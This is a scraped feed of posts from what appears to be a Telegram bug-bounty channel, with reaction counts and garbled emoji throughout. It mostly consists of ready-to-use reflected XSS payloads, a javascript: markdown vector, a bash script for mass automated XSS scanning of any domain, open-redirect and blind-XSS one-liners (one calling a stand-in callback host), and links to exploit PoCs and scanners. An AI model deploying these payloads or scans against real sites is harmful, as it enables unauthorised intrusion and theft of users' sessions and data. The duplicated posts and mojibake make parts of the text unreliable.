Use when current URL is used by targetβs underlying PHP code as an attribute value of an HTML form, for example. Inject between php extension and start of query part (?) using a leading slash (/).
https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
Markdown Vector
Use in text boxes, comment sections, etc that allows some markup input. Click to fire.
[clickme](javascript:alert`1`)
π₯8β€4
This media is not supported in your browser
VIEW IN TELEGRAM
πDnsbruter- Dns Bruteforcing Toolπ
πIt is a powerful tool designed to perform active subdomain enumeration and discovery.
πLink https://github.com/sanjai-AK47/Dnsbruter/
πIt is a powerful tool designed to perform active subdomain enumeration and discovery.
πLink https://github.com/sanjai-AK47/Dnsbruter/
π₯7π3
πBug Bounty PoC'sπ
β https://drive.google.com/drive/folders/14zlqgin6rUfr6jQRBCLbbP8P8Vdypz7x
β https://drive.google.com/drive/folders/14zlqgin6rUfr6jQRBCLbbP8P8Vdypz7x
β€17π5π₯3
Top 3 RXSS payloads
`'";//><img/src=x onError="${x};alert(`1`);">
`'";//><Img Src=a OnError=location=src>
`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>
β€6π₯3β€βπ₯1π1
Simple Reflected XSS
1. subfinder -d target .com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxxs
π₯°7π₯3
Brut Security
Simple Reflected XSS 1. subfinder -d target .com | httprobe -c 100 > target.txt 2. cat target.txt | waybackurls | gf xss | kxxs
For Automation Reflected XSS Scanning
#!/bin/bash
# Prompt user for domain input
read -p "Enter the domain you want to scan: " domain
# Define output file
output_file="scan_output.txt"
# Run subfinder to find subdomains, filter through httprobe, and save to target.txt
echo "Finding subdomains for $domain..."
subfinder -d $domain | httprobe -c 100 > target.txt
# Use waybackurls to find URLs from Wayback Machine, filter through gf for XSS, and scan with kxxs
echo "Scanning for XSS vulnerabilities..."
cat target.txt | waybackurls | gf xss | kxxs >> "$output_file"
# Display output file location
echo "Scan output saved to $output_file"
π₯6β€2
π¨Toxicacheπ¨
πGolang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
πhttps://lnkd.in/gdtpJGmT
πGolang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
πhttps://lnkd.in/gdtpJGmT
β‘5β€3π₯2π1π1
Awesome Bug Bounty One-liners
A collection of awesome one-liner scripts especially for bug bounty.
Open-redirect
Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0. .1:8080 -sk > /dev/null
XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
π Repositories:
1. https://lnkd.in/dMBdxSQD
2. https://lnkd.in/ebTrAP8y
3. https://lnkd.in/dmG4G3ea
4. https://lnkd.in/dXxHMUu9
A collection of awesome one-liner scripts especially for bug bounty.
Open-redirect
Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0. .1:8080 -sk > /dev/null
XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
π Repositories:
1. https://lnkd.in/dMBdxSQD
2. https://lnkd.in/ebTrAP8y
3. https://lnkd.in/dmG4G3ea
4. https://lnkd.in/dXxHMUu9
π10π₯5